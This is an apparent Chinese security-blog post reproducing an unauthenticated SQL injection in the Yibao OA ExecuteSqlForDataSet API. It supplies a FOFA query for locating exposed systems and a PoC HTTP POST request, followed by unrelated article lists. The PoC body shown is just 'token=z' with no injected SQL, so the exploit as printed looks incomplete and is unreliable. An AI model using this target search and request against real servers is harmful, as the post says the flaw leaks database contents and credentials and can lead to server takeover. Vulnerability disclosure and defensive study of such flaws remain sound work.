易宝OA ExecuteSqlForDataSet SQL注入漏洞复现

0x01 产品简介

易宝OA系统是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、 流程管理 、知识管理(档案和业务管理)、协同办公等多种功能。

0x02 漏洞概述

易宝OA ExecuteSqlForDataSet接口处存在SQL注入漏洞,未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限。

0x03 复现环境

FOFA:product="顶讯科技-易宝OA系统"

0x04 漏洞复现

PoC

POST /api/system/ExecuteSqlForDataSet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

token=z

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-04-05 02:42:03       22 阅读
  2. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-04-05 02:42:03       13 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-04-05 02:42:03       19 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-04-05 02:42:03       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-04-05 02:42:03       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-04-05 02:42:03       20 阅读

热门阅读

  1. 面试算法-135-最长递增子序列的个数

    2024-04-05 02:42:03       16 阅读
  2. Memcached 教程之 Memcached append 命令(八)

    2024-04-05 02:42:03       17 阅读
  3. 光伏电站巡检无人机技术优势分析

    2024-04-05 02:42:03       16 阅读
  4. redis-事务使用方法

    2024-04-05 02:42:03       16 阅读
  5. 数码视讯Q7盒子刷armbian或emuelec的一些坑

    2024-04-05 02:42:03       33 阅读
  6. 元宇宙虚拟空间的加载管理(三)

    2024-04-05 02:42:03       17 阅读
  7. 字符串处理算法

    2024-04-05 02:42:03       14 阅读
  8. 零日攻击

    2024-04-05 02:42:03       16 阅读
  9. 01背包问题

    2024-04-05 02:42:03       15 阅读
  10. 从Jenkinsfile构建到k8s部署

    2024-04-05 02:42:03       18 阅读
  11. Git/GitHub/Gitee⼯作流最佳实践

    2024-04-05 02:42:03       15 阅读
  12. 机器学习——典型的卷积神经网络

    2024-04-05 02:42:03       14 阅读
  13. 第十三题:天干地支

    2024-04-05 02:42:03       16 阅读